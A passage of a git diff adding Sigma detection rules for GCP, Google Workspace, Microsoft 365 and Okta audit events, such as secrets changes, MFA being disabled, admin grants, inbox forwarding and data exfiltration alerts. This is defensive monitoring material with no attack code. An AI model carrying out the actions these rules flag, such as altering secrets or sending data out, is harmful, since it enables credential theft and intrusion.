Kubernetes RoleBinding +id: 0322d9f2-289a-47c2-b5e1-b63c90901a3e +description: Detects the creation or patching of potential malicious RoleBinding. This includes RoleBindings and ClusterRoleBinding. +author: Austin Songer @austinsonger +status: experimental +date: 2021/08/09 +references: + - https://github.com/elastic/detection-rules/pull/1267 + - https://kubernetes.io/docs/reference/kubernetes-api/authorization-resources/cluster-role-v1/#ClusterRole + - https://cloud.google.com/kubernetes-engine/docs/how-to/role-based-access-control + - https://kubernetes.io/docs/reference/access-authn-authz/rbac/ + - https://cloud.google.com/kubernetes-engine/docs/how-to/audit-logging +logsource: + product: gcp + service: gcp.audit +detection: + selection: + gcp.audit.method_name: + - io.k8s.authorization.rbac.v*.clusterrolebindings.create + - io.k8s.authorization.rbac.v*.rolebindings.create + - io.k8s.authorization.rbac.v*.clusterrolebindings.patch + - io.k8s.authorization.rbac.v*.rolebindings.patch + - io.k8s.authorization.rbac.v*.clusterrolebindings.update + - io.k8s.authorization.rbac.v*.rolebindings.update + - io.k8s.authorization.rbac.v*.clusterrolebindings.delete + - io.k8s.authorization.rbac.v*.rolebindings.delete + condition: selection +level: medium +tags: + - attack.credential_access +falsepositives: + - RoleBindings and ClusterRoleBinding being modified or deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. + - RoleBindings and ClusterRoleBinding modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule. diff --git a/bin/main/rules/others_cloud/gcp/gcp_kubernetes_secrets_modified_or_deleted.yml b/bin/main/rules/others_cloud/gcp/gcp_kubernetes_secrets_modified_or_deleted.yml new file mode 100644 index 000000000..e609e9e64 --- /dev/null +++ b/bin/main/rules/others_cloud/gcp/gcp_kubernetes_secrets_modified_or_deleted.yml @@ -0,0 +1,25 @@ +title: Google Cloud Kubernetes Secrets Modified or Deleted +id: 2f0bae2d-bf20-4465-be86-1311addebaa3 +description: Identifies when the Secrets are Modified or Deleted. +author: Austin Songer @austinsonger +status: experimental +date: 2021/08/09 +references: + - https://cloud.google.com/kubernetes-engine/docs/how-to/audit-logging +logsource: + product: gcp + service: gcp.audit +detection: + selection: + gcp.audit.method_name: + - io.k8s.core.v*.secrets.create + - io.k8s.core.v*.secrets.update + - io.k8s.core.v*.secrets.patch + - io.k8s.core.v*.secrets.delete + condition: selection +level: medium +tags: + - attack.credential_access +falsepositives: + - Secrets being modified or deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. + - Secrets modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule. diff --git a/bin/main/rules/others_cloud/gcp/gcp_service_account_disabled_or_deleted.yml b/bin/main/rules/others_cloud/gcp/gcp_service_account_disabled_or_deleted.yml new file mode 100644 index 000000000..3976deaf5 --- /dev/null +++ b/bin/main/rules/others_cloud/gcp/gcp_service_account_disabled_or_deleted.yml @@ -0,0 +1,24 @@ +title: Google Cloud Service Account Disabled or Deleted +id: 13f81a90-a69c-4fab-8f07-b5bb55416a9f +description: Identifies when a service account is disabled or deleted in Google Cloud. +author: Austin Songer @austinsonger +status: experimental +date: 2021/08/14 +references: + - https://cloud.google.com/iam/docs/reference/rest/v1/projects.serviceAccounts +logsource: + product: gcp + service: gcp.audit +detection: + selection: + gcp.audit.method_name|endswith: + - .serviceAccounts.disable + - .serviceAccounts.delete + condition: selection +level: medium +tags: + - attack.impact + - attack.t1531 +falsepositives: + - Service Account being disabled or deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. + - Service Account disabled or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule. diff --git a/bin/main/rules/others_cloud/gcp/gcp_service_account_modified.yml b/bin/main/rules/others_cloud/gcp/gcp_service_account_modified.yml new file mode 100644 index 000000000..d43c7e012 --- /dev/null +++ b/bin/main/rules/others_cloud/gcp/gcp_service_account_modified.yml @@ -0,0 +1,26 @@ +title: Google Cloud Service Account Modified +id: 6b67c12e-5e40-47c6-b3b0-1e6b571184cc +description: Identifies when a service account is modified in Google Cloud. +author: Austin Songer @austinsonger +status: experimental +date: 2021/08/14 +references: + - https://cloud.google.com/iam/docs/reference/rest/v1/projects.serviceAccounts +logsource: + product: gcp + service: gcp.audit +detection: + selection: + gcp.audit.method_name|endswith: + - .serviceAccounts.patch + - .serviceAccounts.create + - .serviceAccounts.update + - .serviceAccounts.enable + - .serviceAccounts.undelete + condition: selection +level: medium +tags: + - attack.impact +falsepositives: + - Service Account being modified may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. + - Service Account modified from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule. diff --git a/bin/main/rules/others_cloud/gcp/gcp_sql_database_modified_or_deleted.yml b/bin/main/rules/others_cloud/gcp/gcp_sql_database_modified_or_deleted.yml new file mode 100644 index 000000000..d3b4232fe --- /dev/null +++ b/bin/main/rules/others_cloud/gcp/gcp_sql_database_modified_or_deleted.yml @@ -0,0 +1,26 @@ +title: Google Cloud SQL Database Modified or Deleted +id: f346bbd5-2c4e-4789-a221-72de7685090d +description: Detect when a Cloud SQL DB has been modified or deleted. +author: Austin Songer @austinsonger +status: experimental +date: 2021/10/15 +references: + - https://cloud.google.com/sql/docs/mysql/admin-api/rest/v1beta4/users/update +logsource: + product: gcp + service: gcp.audit +detection: + selection: + gcp.audit.method_name: + - cloudsql.instances.create + - cloudsql.instances.delete + - cloudsql.users.update + - cloudsql.users.delete + condition: selection +level: medium +tags: + - attack.impact +falsepositives: + - SQL Database being modified or deleted may be performed by a system administrator. + - Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. + - SQL Database modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule. diff --git a/bin/main/rules/others_cloud/gcp/gcp_vpn_tunnel_modified_or_deleted.yml b/bin/main/rules/others_cloud/gcp/gcp_vpn_tunnel_modified_or_deleted.yml new file mode 100644 index 000000000..781bef103 --- /dev/null +++ b/bin/main/rules/others_cloud/gcp/gcp_vpn_tunnel_modified_or_deleted.yml @@ -0,0 +1,24 @@ +title: Google Cloud VPN Tunnel Modified or Deleted +id: 99980a85-3a61-43d3-ac0f-b68d6b4797b1 +description: Identifies when a VPN Tunnel Modified or Deleted in Google Cloud. +author: Austin Songer @austinsonger +status: experimental +date: 2021/08/16 +references: + - https://any-api.com/googleapis_com/compute/docs/vpnTunnels +logsource: + product: gcp + service: gcp.audit +detection: + selection: + gcp.audit.method_name: + - compute.vpnTunnels.insert + - compute.vpnTunnels.delete + condition: selection +level: medium +tags: + - attack.impact +falsepositives: + - VPN Tunnel being modified or deleted may be performed by a system administrator. + - Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. + - VPN Tunnel modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule. diff --git a/bin/main/rules/others_cloud/gworkspace/gworkspace_application_removed.yml b/bin/main/rules/others_cloud/gworkspace/gworkspace_application_removed.yml new file mode 100644 index 000000000..e0ea857f7 --- /dev/null +++ b/bin/main/rules/others_cloud/gworkspace/gworkspace_application_removed.yml @@ -0,0 +1,25 @@ +title: Google Workspace Application Removed +id: ee2803f0-71c8-4831-b48b-a1fc57601ee4 +description: Detects when an an application is removed from Google Workspace. +author: Austin Songer +status: experimental +date: 2021/08/26 +references: + - https://cloud.google.com/logging/docs/audit/gsuite-audit-logging#3 + - https://developers.google.com/admin-sdk/reports/v1/appendix/activity/admin-domain-settings?hl=en#REMOVE_APPLICATION + - https://developers.google.com/admin-sdk/reports/v1/appendix/activity/admin-domain-settings?hl=en#REMOVE_APPLICATION_FROM_WHITELIST +logsource: + product: google_workspace + service: google_workspace.admin +detection: + selection: + eventService: admin.googleapis.com + eventName: + - REMOVE_APPLICATION + - REMOVE_APPLICATION_FROM_WHITELIST + condition: selection +level: medium +tags: + - attack.impact +falsepositives: + - Application being removed may be performed by a System Administrator. diff --git a/bin/main/rules/others_cloud/gworkspace/gworkspace_granted_domain_api_access.yml b/bin/main/rules/others_cloud/gworkspace/gworkspace_granted_domain_api_access.yml new file mode 100644 index 000000000..dab6f04db --- /dev/null +++ b/bin/main/rules/others_cloud/gworkspace/gworkspace_granted_domain_api_access.yml @@ -0,0 +1,23 @@ +title: Google Workspace Granted Domain API Access +id: 04e2a23a-9b29-4a5c-be3a-3542e3f982ba +description: Detects when an API access service account is granted domain authority. +author: Austin Songer +status: experimental +date: 2021/08/23 +references: + - https://cloud.google.com/logging/docs/audit/gsuite-audit-logging#3 + - https://developers.google.com/admin-sdk/reports/v1/appendix/activity/admin-domain-settings#AUTHORIZE_API_CLIENT_ACCESS +logsource: + product: google_workspace + service: google_workspace.admin +detection: + selection: + eventService: admin.googleapis.com + eventName: AUTHORIZE_API_CLIENT_ACCESS + condition: selection +level: medium +tags: + - attack.persistence + - attack.t1098 +falsepositives: + - Unknown diff --git a/bin/main/rules/others_cloud/gworkspace/gworkspace_mfa_disabled.yml b/bin/main/rules/others_cloud/gworkspace/gworkspace_mfa_disabled.yml new file mode 100644 index 000000000..ce2c1b0e9 --- /dev/null +++ b/bin/main/rules/others_cloud/gworkspace/gworkspace_mfa_disabled.yml @@ -0,0 +1,28 @@ +title: Google Workspace MFA Disabled +id: 780601d1-6376-4f2a-884e-b8d45599f78c +description: Detects when multi-factor authentication (MFA) is disabled. +author: Austin Songer +status: experimental +date: 2021/08/26 +modified: 2021/12/02 +references: + - https://cloud.google.com/logging/docs/audit/gsuite-audit-logging#3 + - https://developers.google.com/admin-sdk/reports/v1/appendix/activity/admin-security-settings#ENFORCE_STRONG_AUTHENTICATION + - https://developers.google.com/admin-sdk/reports/v1/appendix/activity/admin-security-settings?hl=en#ALLOW_STRONG_AUTHENTICATION +logsource: + product: google_workspace + service: google_workspace.admin +detection: + selection_base: + eventService: admin.googleapis.com + eventName: + - ENFORCE_STRONG_AUTHENTICATION + - ALLOW_STRONG_AUTHENTICATION + selection_eventValue: + new_value: 'false' + condition: all of selection* +level: medium +tags: + - attack.impact +falsepositives: + - MFA may be disabled and performed by a system administrator. diff --git a/bin/main/rules/others_cloud/gworkspace/gworkspace_role_modified_or_deleted.yml b/bin/main/rules/others_cloud/gworkspace/gworkspace_role_modified_or_deleted.yml new file mode 100644 index 000000000..4d37bb058 --- /dev/null +++ b/bin/main/rules/others_cloud/gworkspace/gworkspace_role_modified_or_deleted.yml @@ -0,0 +1,25 @@ +title: Google Workspace Role Modified or Deleted +id: 6aef64e3-60c6-4782-8db3-8448759c714e +description: Detects when an a role is modified or deleted in Google Workspace. +author: Austin Songer +status: experimental +date: 2021/08/24 +references: + - https://cloud.google.com/logging/docs/audit/gsuite-audit-logging#3 + - https://developers.google.com/admin-sdk/reports/v1/appendix/activity/admin-delegated-admin-settings +logsource: + product: google_workspace + service: google_workspace.admin +detection: + selection: + eventService: admin.googleapis.com + eventName: + - DELETE_ROLE + - RENAME_ROLE + - UPDATE_ROLE + condition: selection +level: medium +tags: + - attack.impact +falsepositives: + - Unknown diff --git a/bin/main/rules/others_cloud/gworkspace/gworkspace_role_privilege_deleted.yml b/bin/main/rules/others_cloud/gworkspace/gworkspace_role_privilege_deleted.yml new file mode 100644 index 000000000..0a81d079f --- /dev/null +++ b/bin/main/rules/others_cloud/gworkspace/gworkspace_role_privilege_deleted.yml @@ -0,0 +1,22 @@ +title: Google Workspace Role Privilege Deleted +id: bf638ef7-4d2d-44bb-a1dc-a238252e6267 +description: Detects when an a role privilege is deleted in Google Workspace. +author: Austin Songer +status: experimental +date: 2021/08/24 +references: + - https://cloud.google.com/logging/docs/audit/gsuite-audit-logging#3 + - https://developers.google.com/admin-sdk/reports/v1/appendix/activity/admin-delegated-admin-settings +logsource: + product: google_workspace + service: google_workspace.admin +detection: + selection: + eventService: admin.googleapis.com + eventName: REMOVE_PRIVILEGE + condition: selection +level: medium +tags: + - attack.impact +falsepositives: + - Unknown diff --git a/bin/main/rules/others_cloud/gworkspace/gworkspace_user_granted_admin_privileges.yml b/bin/main/rules/others_cloud/gworkspace/gworkspace_user_granted_admin_privileges.yml new file mode 100644 index 000000000..73c8fe835 --- /dev/null +++ b/bin/main/rules/others_cloud/gworkspace/gworkspace_user_granted_admin_privileges.yml @@ -0,0 +1,25 @@ +title: Google Workspace User Granted Admin Privileges +id: 2d1b83e4-17c6-4896-a37b-29140b40a788 +description: Detects when an Google Workspace user is granted admin privileges. +author: Austin Songer +status: experimental +date: 2021/08/23 +references: + - https://cloud.google.com/logging/docs/audit/gsuite-audit-logging#3 + - https://developers.google.com/admin-sdk/reports/v1/appendix/activity/admin-user-settings#GRANT_ADMIN_PRIVILEGE +logsource: + product: google_workspace + service: google_workspace.admin +detection: + selection: + eventService: admin.googleapis.com + eventName: + - GRANT_DELEGATED_ADMIN_PRIVILEGES + - GRANT_ADMIN_PRIVILEGE + condition: selection +level: medium +tags: + - attack.persistence + - attack.t1098 +falsepositives: + - Google Workspace admin role privileges, may be modified by system administrators. diff --git a/bin/main/rules/others_cloud/m365/microsoft365_activity_by_terminated_user.yml b/bin/main/rules/others_cloud/m365/microsoft365_activity_by_terminated_user.yml new file mode 100644 index 000000000..ed18a8521 --- /dev/null +++ b/bin/main/rules/others_cloud/m365/microsoft365_activity_by_terminated_user.yml @@ -0,0 +1,23 @@ +title: Activity Performed by Terminated User +id: 2e669ed8-742e-4fe5-b3c4-5a59b486c2ee +status: experimental +description: Detects when a Microsoft Cloud App Security reported for users whose account were terminated in Azure AD, but still perform activities in other platforms such as AWS or Salesforce. This is especially relevant for users who use another account to manage resources, since these accounts are often not terminated when a user leaves the company. +author: Austin Songer @austinsonger +date: 2021/08/23 +references: + - https://docs.microsoft.com/en-us/cloud-app-security/anomaly-detection-policy + - https://docs.microsoft.com/en-us/cloud-app-security/policy-template-reference +logsource: + service: threat_management + product: m365 +detection: + selection: + eventSource: SecurityComplianceCenter + eventName: 'Activity performed by terminated user' + status: success + condition: selection +falsepositives: + - Unknown +level: medium +tags: + - attack.impact diff --git a/bin/main/rules/others_cloud/m365/microsoft365_activity_from_anonymous_ip_addresses.yml b/bin/main/rules/others_cloud/m365/microsoft365_activity_from_anonymous_ip_addresses.yml new file mode 100644 index 000000000..2fb822e9b --- /dev/null +++ b/bin/main/rules/others_cloud/m365/microsoft365_activity_from_anonymous_ip_addresses.yml @@ -0,0 +1,24 @@ +title: Activity from Anonymous IP Addresses +id: d8b0a4fe-07a8-41be-bd39-b14afa025d95 +status: experimental +description: Detects when a Microsoft Cloud App Security reported when users were active from an IP address that has been identified as an anonymous proxy IP address. +author: Austin Songer @austinsonger +date: 2021/08/23 +references: + - https://docs.microsoft.com/en-us/cloud-app-security/anomaly-detection-policy + - https://docs.microsoft.com/en-us/cloud-app-security/policy-template-reference +logsource: + service: threat_management + product: m365 +detection: + selection: + eventSource: SecurityComplianceCenter + eventName: 'Activity from anonymous IP addresses' + status: success + condition: selection +falsepositives: + - User using a VPN or Proxy +level: medium +tags: + - attack.command_and_control + - attack.t1573 diff --git a/bin/main/rules/others_cloud/m365/microsoft365_activity_from_infrequent_country.yml b/bin/main/rules/others_cloud/m365/microsoft365_activity_from_infrequent_country.yml new file mode 100644 index 000000000..24cb1c14d --- /dev/null +++ b/bin/main/rules/others_cloud/m365/microsoft365_activity_from_infrequent_country.yml @@ -0,0 +1,24 @@ +title: Activity from Infrequent Country +id: 0f2468a2-5055-4212-a368-7321198ee706 +status: experimental +description: Detects when a Microsoft Cloud App Security reported when an activity occurs from a location that wasn't recently or never visited by any user in the organization. +author: Austin Songer @austinsonger +date: 2021/08/23 +references: + - https://docs.microsoft.com/en-us/cloud-app-security/anomaly-detection-policy + - https://docs.microsoft.com/en-us/cloud-app-security/policy-template-reference +logsource: + service: threat_management + product: m365 +detection: + selection: + eventSource: SecurityComplianceCenter + eventName: 'Activity from infrequent country' + status: success + condition: selection +falsepositives: + - Unknown +level: medium +tags: + - attack.command_and_control + - attack.t1573 diff --git a/bin/main/rules/others_cloud/m365/microsoft365_data_exfiltration_to_unsanctioned_app.yml b/bin/main/rules/others_cloud/m365/microsoft365_data_exfiltration_to_unsanctioned_app.yml new file mode 100644 index 000000000..2f407d50a --- /dev/null +++ b/bin/main/rules/others_cloud/m365/microsoft365_data_exfiltration_to_unsanctioned_app.yml @@ -0,0 +1,24 @@ +title: Data Exfiltration to Unsanctioned Apps +id: 2b669496-d215-47d8-bd9a-f4a45bf07cda +status: experimental +description: Detects when a Microsoft Cloud App Security reported when a user or IP address uses an app that is not sanctioned to perform an activity that resembles an attempt to exfiltrate information from your organization. +author: Austin Songer @austinsonger +date: 2021/08/23 +references: + - https://docs.microsoft.com/en-us/cloud-app-security/anomaly-detection-policy + - https://docs.microsoft.com/en-us/cloud-app-security/policy-template-reference +logsource: + service: threat_management + product: m365 +detection: + selection: + eventSource: SecurityComplianceCenter + eventName: 'Data exfiltration to unsanctioned apps' + status: success + condition: selection +falsepositives: + - Unknown +level: medium +tags: + - attack.exfiltration + - attack.t1537 diff --git a/bin/main/rules/others_cloud/m365/microsoft365_from_susp_ip_addresses.yml b/bin/main/rules/others_cloud/m365/microsoft365_from_susp_ip_addresses.yml new file mode 100644 index 000000000..a23c08c4b --- /dev/null +++ b/bin/main/rules/others_cloud/m365/microsoft365_from_susp_ip_addresses.yml @@ -0,0 +1,24 @@ +title: Activity from Suspicious IP Addresses +id: a3501e8e-af9e-43c6-8cd6-9360bdaae498 +status: experimental +description: Detects when a Microsoft Cloud App Security reported users were active from an IP address identified as risky by Microsoft Threat Intelligence. These IP addresses are involved in malicious activities, such as Botnet C&C, and may indicate compromised account. +author: Austin Songer @austinsonger +date: 2021/08/23 +references: + - https://docs.microsoft.com/en-us/cloud-app-security/anomaly-detection-policy + - https://docs.microsoft.com/en-us/cloud-app-security/policy-template-reference +logsource: + service: threat_detection + product: m365 +detection: + selection: + eventSource: SecurityComplianceCenter + eventName: 'Activity from suspicious IP addresses' + status: success + condition: selection +falsepositives: + - Unknown +level: medium +tags: + - attack.command_and_control + - attack.t1573 diff --git a/bin/main/rules/others_cloud/m365/microsoft365_impossible_travel_activity.yml b/bin/main/rules/others_cloud/m365/microsoft365_impossible_travel_activity.yml new file mode 100644 index 000000000..efa9b6799 --- /dev/null +++ b/bin/main/rules/others_cloud/m365/microsoft365_impossible_travel_activity.yml @@ -0,0 +1,25 @@ +title: Microsoft 365 - Impossible Travel Activity +id: d7eab125-5f94-43df-8710-795b80fa1189 +status: test +description: Detects when a Microsoft Cloud App Security reported a risky sign-in attempt due to a login associated with an impossible travel. +author: Austin Songer @austinsonger +references: + - https://docs.microsoft.com/en-us/cloud-app-security/anomaly-detection-policy + - https://docs.microsoft.com/en-us/cloud-app-security/policy-template-reference +date: 2020/07/06 +modified: 2021/11/27 +logsource: + service: threat_management + product: m365 +detection: + selection: + eventSource: SecurityComplianceCenter + eventName: 'Impossible travel activity' + status: success + condition: selection +falsepositives: + - Unknown +level: medium +tags: + - attack.initial_access + - attack.t1078 diff --git a/bin/main/rules/others_cloud/m365/microsoft365_logon_from_risky_ip_address.yml b/bin/main/rules/others_cloud/m365/microsoft365_logon_from_risky_ip_address.yml new file mode 100644 index 000000000..98bba6910 --- /dev/null +++ b/bin/main/rules/others_cloud/m365/microsoft365_logon_from_risky_ip_address.yml @@ -0,0 +1,24 @@ +title: Logon from a Risky IP Address +id: c191e2fa-f9d6-4ccf-82af-4f2aba08359f +status: experimental +description: Detects when a Microsoft Cloud App Security reported when a user signs into your sanctioned apps from a risky IP address. +author: Austin Songer @austinsonger +date: 2021/08/23 +references: + - https://docs.microsoft.com/en-us/cloud-app-security/anomaly-detection-policy + - https://docs.microsoft.com/en-us/cloud-app-security/policy-template-reference +logsource: + service: threat_management + product: m365 +detection: + selection: + eventSource: SecurityComplianceCenter + eventName: 'Log on from a risky IP address' + status: success + condition: selection +falsepositives: + - Unknown +level: medium +tags: + - attack.initial_access + - attack.t1078 diff --git a/bin/main/rules/others_cloud/m365/microsoft365_new_federated_domain_added.yml b/bin/main/rules/others_cloud/m365/microsoft365_new_federated_domain_added.yml new file mode 100644 index 000000000..adbf52d44 --- /dev/null +++ b/bin/main/rules/others_cloud/m365/microsoft365_new_federated_domain_added.yml @@ -0,0 +1,27 @@ +title: New Federated Domain Added +id: 42127bdd-9133-474f-a6f1-97b6c08a4339 +status: experimental +description: Alert for the addition of a new federated domain. +author: '@ionsor' +date: 2022/02/08 +references: + - https://www.fireeye.com/content/dam/fireeye-www/blog/pdfs/wp-m-unc2452-2021-000343-01.pdf + - https://us-cert.cisa.gov/ncas/alerts/aa21-008a + - https://www.splunk.com/en_us/blog/security/a-golden-saml-journey-solarwinds-continued.html + - https://www.sygnia.co/golden-saml-advisory + - https://o365blog.com/post/aadbackdoor/ +logsource: + service: exchange + product: m365 +detection: + selection: + eventSource: Exchange + eventName: 'Add-FederatedDomain' + status: success + condition: selection +falsepositives: + - The creation of a new Federated domain is not necessarily malicious, however these events need to be followed closely, as it may indicate federated credential abuse or backdoor via federated identities at a similar or different cloud provider. +level: medium +tags: + - attack.persistence + - attack.t1136.003 diff --git a/bin/main/rules/others_cloud/m365/microsoft365_potential_ransomware_activity.yml b/bin/main/rules/others_cloud/m365/microsoft365_potential_ransomware_activity.yml new file mode 100644 index 000000000..489613f57 --- /dev/null +++ b/bin/main/rules/others_cloud/m365/microsoft365_potential_ransomware_activity.yml @@ -0,0 +1,24 @@ +title: Microsoft 365 - Potential Ransomware Activity +id: bd132164-884a-48f1-aa2d-c6d646b04c69 +status: experimental +description: Detects when a Microsoft Cloud App Security reported when a user uploads files to the cloud that might be infected with ransomware. +author: austinsonger +date: 2021/08/19 +references: + - https://docs.microsoft.com/en-us/cloud-app-security/anomaly-detection-policy + - https://docs.microsoft.com/en-us/cloud-app-security/policy-template-reference +logsource: + service: threat_management + product: m365 +detection: + selection: + eventSource: SecurityComplianceCenter + eventName: 'Potential ransomware activity' + status: success + condition: selection +falsepositives: + - Unknown +level: medium +tags: + - attack.impact + - attack.t1486 diff --git a/bin/main/rules/others_cloud/m365/microsoft365_susp_inbox_forwarding.yml b/bin/main/rules/others_cloud/m365/microsoft365_susp_inbox_forwarding.yml new file mode 100644 index 000000000..b7916e14a --- /dev/null +++ b/bin/main/rules/others_cloud/m365/microsoft365_susp_inbox_forwarding.yml @@ -0,0 +1,24 @@ +title: Suspicious Inbox Forwarding +id: 6c220477-0b5b-4b25-bb90-66183b4089e8 +status: experimental +description: Detects when a Microsoft Cloud App Security reported suspicious email forwarding rules, for example, if a user created an inbox rule that forwards a copy of all emails to an external address. +author: Austin Songer @austinsonger +date: 2021/08/22 +references: + - https://docs.microsoft.com/en-us/cloud-app-security/anomaly-detection-policy + - https://docs.microsoft.com/en-us/cloud-app-security/policy-template-reference +logsource: + service: threat_management + product: m365 +detection: + selection: + eventSource: SecurityComplianceCenter + eventName: 'Suspicious inbox forwarding' + status: success + condition: selection +falsepositives: + - Unknown +level: low +tags: + - attack.exfiltration + - attack.t1020 diff --git a/bin/main/rules/others_cloud/m365/microsoft365_susp_oauth_app_file_download_activities.yml b/bin/main/rules/others_cloud/m365/microsoft365_susp_oauth_app_file_download_activities.yml new file mode 100644 index 000000000..1c2bbf799 --- /dev/null +++ b/bin/main/rules/others_cloud/m365/microsoft365_susp_oauth_app_file_download_activities.yml @@ -0,0 +1,23 @@ +title: Suspicious OAuth App File Download Activities +id: ee111937-1fe7-40f0-962a-0eb44d57d174 +status: experimental +description: Detects when a Microsoft Cloud App Security reported when an app downloads multiple files from Microsoft SharePoint or Microsoft OneDrive in a manner that is unusual for the user. +author: Austin Songer @austinsonger +date: 2021/08/23 +references: + - https://docs.microsoft.com/en-us/cloud-app-security/anomaly-detection-policy + - https://docs.microsoft.com/en-us/cloud-app-security/policy-template-reference +logsource: + service: threat_management + product: m365 +detection: + selection: + eventSource: SecurityComplianceCenter + eventName: 'Suspicious OAuth app file download activities' + status: success + condition: selection +falsepositives: + - Unknown +level: medium +tags: + - attack.exfiltration diff --git a/bin/main/rules/others_cloud/m365/microsoft365_unusual_volume_of_file_deletion.yml b/bin/main/rules/others_cloud/m365/microsoft365_unusual_volume_of_file_deletion.yml new file mode 100644 index 000000000..6f68cbd70 --- /dev/null +++ b/bin/main/rules/others_cloud/m365/microsoft365_unusual_volume_of_file_deletion.yml @@ -0,0 +1,24 @@ +title: Microsoft 365 - Unusual Volume of File Deletion +id: 78a34b67-3c39-4886-8fb4-61c46dc18ecd +status: experimental +description: Detects when a Microsoft Cloud App Security reported a user has deleted a unusual a large volume of files. +author: austinsonger +date: 2021/08/19 +references: + - https://docs.microsoft.com/en-us/cloud-app-security/anomaly-detection-policy + - https://docs.microsoft.com/en-us/cloud-app-security/policy-template-reference +logsource: + service: threat_management + product: m365 +detection: + selection: + eventSource: SecurityComplianceCenter + eventName: 'Unusual volume of file deletion' + status: success + condition: selection +falsepositives: + - Unknown +level: medium +tags: + - attack.impact + - attack.t1485 diff --git a/bin/main/rules/others_cloud/m365/microsoft365_user_restricted_from_sending_email.yml b/bin/main/rules/others_cloud/m365/microsoft365_user_restricted_from_sending_email.yml new file mode 100644 index 000000000..a334ac653 --- /dev/null +++ b/bin/main/rules/others_cloud/m365/microsoft365_user_restricted_from_sending_email.yml @@ -0,0 +1,24 @@ +title: Microsoft 365 - User Restricted from Sending Email +id: ff246f56-7f24-402a-baca-b86540e3925c +status: experimental +description: Detects when a Security Compliance Center reported a user who exceeded sending limits of the service policies and because of this has been restricted from sending email. +author: austinsonger +date: 2021/08/19 +references: + - https://docs.microsoft.com/en-us/cloud-app-security/anomaly-detection-policy + - https://docs.microsoft.com/en-us/cloud-app-security/policy-template-reference +logsource: + service: threat_management + product: m365 +detection: + selection: + eventSource: SecurityComplianceCenter + eventName: 'User restricted from sending email' + status: success + condition: selection +falsepositives: + - Unknown +level: medium +tags: + - attack.initial_access + - attack.t1199 diff --git a/bin/main/rules/others_cloud/okta/okta_admin_role_assigned_to_user_or_group.yml b/bin/main/rules/others_cloud/okta/okta_admin_role_assigned_to_user_or_group.yml new file mode 100644 index 000000000..2574abf14 --- /dev/null +++ b/bin/main/rules/others_cloud/okta/okta_admin_role_assigned_to_user_or_group.yml @@ -0,0 +1,24 @@ +title: Okta Admin Role Assigned to an User or Group +id: 413d4a81-6c98-4479-9863-014785fd579c +description: Detects when an the Administrator role is assigned to an user or group. +author: Austin Songer @austinsonger +status: experimental +date: 2021/09/12 +modified: 2021/09/22 +references: + - https://developer.okta.com/docs/reference/api/system-log/ + - https://developer.okta.com/docs/reference/api/event-types/ +logsource: + product: okta + service: okta +detection: + selection: + eventtype: + - group.privilege.grant + - user.account.privilege.grant + condition: selection +level: medium +tags: + - attack.impact +falsepositives: + - Administrator roles could be assigned to users or group by other admin users. diff --git a/bin/main/rules/others_cloud/okta/okta_api_token_created.yml b/bin/main/rules/others_cloud/okta/okta_api_token_created.yml new file mode 100644 index 000000000..8f816d033 --- /dev/null +++ b/bin/main/rules/others_cloud/okta/okta_api_token_created.yml @@ -0,0 +1,22 @@ +title: Okta API Token Created +id: 19951c21-229d-4ccb-8774-b993c3ff3c5c +description: Detects when a API token is created +author: Austin Songer @austinsonger +status: experimental +date: 2021/09/12 +modified: 2021/09/22 +references: + - https://developer.okta.com/docs/reference/api/system-log/ + - https://developer.okta.com/docs/reference/api/event-types/ +logsource: + product: okta + service: okta +detection: + selection: + eventtype: system.api_token.create + condition: selection +level: medium +tags: + - attack.persistence +falsepositives: + - Unknown diff --git a/bin/main/rules/others_cloud/okta/okta_api_token_revoked.yml b/bin/main/rules/others_cloud/okta/okta_api_token_revoked.yml new file mode 100644 index 000000000..9919a5085 --- /dev/null +++ b/bin/main/rules/others_cloud/okta/okta_api_token_revoked.yml @@ -0,0 +1,22 @@ +title: Okta API Token Revoked +id: cf1dbc6b-6205-41b4-9b88-a83980d2255b +description: Detects when a API Token is revoked. +author: Austin Songer @austinsonger +status: experimental +date: 2021/09/12 +modified: 2021/09/22 +references: + - https://developer.okta.com/docs/reference/api/system-log/ + - https://developer.okta.com/docs/reference/api/event-types/ +logsource: + product: okta + service: okta +detection: + selection: + eventtype: system.api_token.revoke + condition: selection +level: medium +tags: + - attack.impact +falsepositives: + - Unknown diff --git a/bin/main/rules/others_cloud/okta/okta_application_modified_or_deleted.yml b/bin/main/rules/others_cloud/okta/okta_application_modified_or_deleted.yml new file mode 100644 index 000000000..849da89b0 --- /dev/null +++ b/bin/main/rules/others_cloud/okta/okta_application_modified_or_deleted.yml @@ -0,0 +1,24 @@ +title: Okta Application Modified or Deleted +id: 7899144b-e416-4c28-b0b5-ab8f9e0a541d +description: Detects when an application is modified or deleted. +author: Austin Songer @austinsonger +status: experimental +date: 2021/09/12 +modified: 2021/09/22 +references: + - https://developer.okta.com/docs/reference/api/system-log/ + - https://developer.okta.com/docs/reference/api/event-types/ +logsource: + product: okta + service: okta +detection: + selection: + eventtype: + - application.lifecycle.update + - application.lifecycle.delete + condition: selection +level: medium +tags: + - attack.impact +falsepositives: + - Unknown diff --git a/bin/main/rules/others_cloud/okta/okta_application_sign_on_policy_modified_or_deleted.yml b/bin/main/rules/others_cloud/okta/okta_application_sign_on_policy_modified_or_deleted.yml new file mode 100644 index 000000000..bff4ff5ef --- /dev/null +++ b/bin/main/rules/others_cloud/okta/okta_application_sign_on_policy_modified_or_deleted.yml @@ -0,0 +1,24 @@ +title: Okta Application Sign-On Policy Modified or Deleted +id: 8f668cc4-c18e-45fe-ad00-624a981cf88a +description: Detects when an application Sign-on Policy is modified or deleted. +author: Austin Songer @austinsonger +status: experimental +date: 2021/09/12 +modified: 2021/09/22 +references: + - https://developer.okta.com/docs/reference/api/system-log/ + - 